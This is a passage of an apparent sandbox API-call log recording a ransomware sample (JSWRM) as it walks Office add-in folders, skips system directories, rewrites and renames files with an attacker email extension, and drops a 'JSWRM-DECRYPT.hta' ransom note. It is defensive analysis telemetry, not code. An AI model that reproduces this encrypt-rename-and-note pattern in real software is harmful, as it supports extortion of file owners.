ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x5f76153, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4940, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0125.317] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2=".") returned 1 [0125.317] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="..") returned 1 [0125.317] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="...") returned 1 [0125.317] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="windows") returned -1 [0125.317] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="recovery") returned -1 [0125.317] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="perflogs") returned -1 [0125.317] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="documents and settings") returned 1 [0125.317] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.317] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="system volume information") returned -1 [0125.317] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="msocache") returned -1 [0125.317] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0125.317] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dba8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0125.317] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0125.317] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dde8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0125.317] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x15e45dad, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x15e45dad, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x15e6c018, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4f8bf, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="PowerViewRes.sl.xap", cAlternateFileName="POWERV~1.XAP")) returned 1 [0125.317] lstrcmpiW (lpString1="PowerViewRes.sl.xap", lpString2=".") returned 1 [0125.317] lstrcmpiW (lpString1="PowerViewRes.sl.xap", lpString2="..") returned 1 [0125.317] lstrcmpiW (lpString1="PowerViewRes.sl.xap", lpString2="...") returned 1 [0125.317] lstrcmpiW (lpString1="PowerViewRes.sl.xap", lpString2="windows") returned -1 [0125.317] lstrcmpiW (lpString1="PowerViewRes.sl.xap", lpString2="recovery") returned -1 [0125.317] lstrcmpiW (lpString1="PowerViewRes.sl.xap", lpString2="perflogs") returned 1 [0125.317] lstrcmpiW (lpString1="PowerViewRes.sl.xap", lpString2="documents and settings") returned 1 [0125.317] lstrcmpiW (lpString1="PowerViewRes.sl.xap", lpString2="$RECYCLE.BIN") returned 1 [0125.317] lstrcmpiW (lpString1="PowerViewRes.sl.xap", lpString2="system volume information") returned -1 [0125.318] lstrcmpiW (lpString1="PowerViewRes.sl.xap", lpString2="msocache") returned 1 [0125.318] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.sl.xap", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0125.318] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.sl.xap", cchWideChar=19, lpMultiByteStr=0x241290, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.sl.xap", lpUsedDefaultChar=0x0) returned 19 [0125.318] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.sl.xap", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0125.318] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.sl.xap", cchWideChar=19, lpMultiByteStr=0x2412b8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.sl.xap", lpUsedDefaultChar=0x0) returned 19 [0125.318] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0125.318] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0125.318] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\sl\\PowerViewRes.sl.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\sl\\powerviewres.sl.xap"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0125.318] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=325823) returned 1 [0125.318] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0125.319] ReadFile (in: hFile=0x338, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e1cc*=0x27100, lpOverlapped=0x0) returned 1 [0125.382] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0125.382] WriteFile (in: hFile=0x338, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e1c8*=0x27100, lpOverlapped=0x0) returned 1 [0125.383] CloseHandle (hObject=0x338) returned 1 [0125.383] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\sl\\PowerViewRes.sl.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\sl\\powerviewres.sl.xap"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\sl\\PowerViewRes.sl.xap.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\sl\\powerviewres.sl.xap.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0125.384] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x15e45dad, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x15e45dad, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x15e6c018, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4f8bf, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="PowerViewRes.sl.xap", cAlternateFileName="POWERV~1.XAP")) returned 0 [0125.384] FindClose (in: hFindFile=0x231dc0 | out: hFindFile=0x231dc0) returned 1 [0125.385] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1a2a905, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x15f04999, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x15f04999, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="sr-cyrl", cAlternateFileName="")) returned 1 [0125.385] lstrcmpiW (lpString1="sr-cyrl", lpString2=".") returned 1 [0125.385] lstrcmpiW (lpString1="sr-cyrl", lpString2="..") returned 1 [0125.385] lstrcmpiW (lpString1="sr-cyrl", lpString2="...") returned 1 [0125.385] lstrcmpiW (lpString1="sr-cyrl", lpString2="windows") returned -1 [0125.385] lstrcmpiW (lpString1="sr-cyrl", lpString2="recovery") returned 1 [0125.385] lstrcmpiW (lpString1="sr-cyrl", lpString2="perflogs") returned 1 [0125.385] lstrcmpiW (lpString1="sr-cyrl", lpString2="documents and settings") returned 1 [0125.385] lstrcmpiW (lpString1="sr-cyrl", lpString2="$RECYCLE.BIN") returned 1 [0125.385] lstrcmpiW (lpString1="sr-cyrl", lpString2="system volume information") returned -1 [0125.385] lstrcmpiW (lpString1="sr-cyrl", lpString2="msocache") returned 1 [0125.385] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\sr-cyrl\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\sr-cyrl\\jswrm-decrypt.hta")) returned 0xffffffff [0125.386] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0125.386] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b424, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0125.386] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0125.386] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x2501e8 [0125.386] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x251fb8 [0125.386] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\sr-cyrl\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\sr-cyrl\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0125.387] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0125.387] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0125.388] CloseHandle (hObject=0x314) returned 1 [0125.388] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f4d0 | out: hHeap=0x1e0000) returned 1 [0125.388] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x251fb8 | out: hHeap=0x1e0000) returned 1 [0125.389] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0125.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0125.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0125.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0125.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b510 [0125.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f158 [0125.389] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b510 | out: hHeap=0x1e0000) returned 1 [0125.389] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\sr-cyrl\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\sr-cyrl\\jswrm-decrypt.hta")) returned 0x20 [0125.389] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f158 | out: hHeap=0x1e0000) returned 1 [0125.389] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0125.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b6a0 [0125.389] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\sr-cyrl\\*.*", lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1a2a905, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x15f04999, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4164e358, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x231dc0 [0125.389] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0125.389] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1a2a905, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x15f04999, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4164e358, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0125.389] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0125.390] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0125.390] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf1a2a905, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1a2a905, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1600fa20, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc40a8, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="AdHocReportingExcelClient.dll", cAlternateFileName="ADHOCR~1.DLL")) returned 1 [0125.390] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2=".") returned 1 [0125.390] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="..") returned 1 [0125.390] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="...") returned 1 [0125.390] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="windows") returned -1 [0125.390] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="recovery") returned -1 [0125.390] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="perflogs") returned -1 [0125.390] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="documents and settings") returned -1 [0125.390] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.390] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="system volume information") returned -1 [0125.390] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="msocache") returned -1 [0125.390] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0125.390] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0125.390] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0125.390] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x241038, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0125.390] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0125.390] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0125.390] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0125.390] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0125.390] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x240f20, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0125.390] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0125.390] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf0) returned 0x247990 [0125.390] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b6a0 | out: hHeap=0x1e0000) returned 1 [0125.390] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0125.390] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0125.390] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4164e358, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x4164e358, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x4164e358, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0125.390] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0125.390] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0125.390] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0125.390] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0125.390] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0125.390] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0125.390] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0125.391] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0125.391] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0125.391] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0125.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0125.391] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0125.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0125.391] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f20, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0125.391] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0125.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0125.391] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0125.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0125.391] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2412e0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0125.391] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0125.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b2b0 [0125.391] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0125.391] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0125.391] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0125.391] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x5ab1579, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x5ab1579, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6165f55, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x18040, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.PowerBI.Diagnostics.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0125.391] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2=".") returned 1 [0125.391] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="..") returned 1 [0125.391] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="...") returned 1 [0125.391] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="windows") returned -1 [0125.391] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="recovery") returned -1 [0125.391] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="perflogs") returned -1 [0125.391] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="documents and settings") returned 1 [0125.391] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.391] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="system volume information") returned -1 [0125.391] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="msocache") returned -1 [0125.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233230 [0125.391] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0125.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0125.391] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d0a0, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0125.391] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233230 | out: hHeap=0x1e0000) returned 1 [0125.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ce8 [0125.391] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0125.392] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0125.392] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22cdc8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0125.392] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ce8 | out: hHeap=0x1e0000) returned 1 [0125.392] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23e340 [0125.392] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, 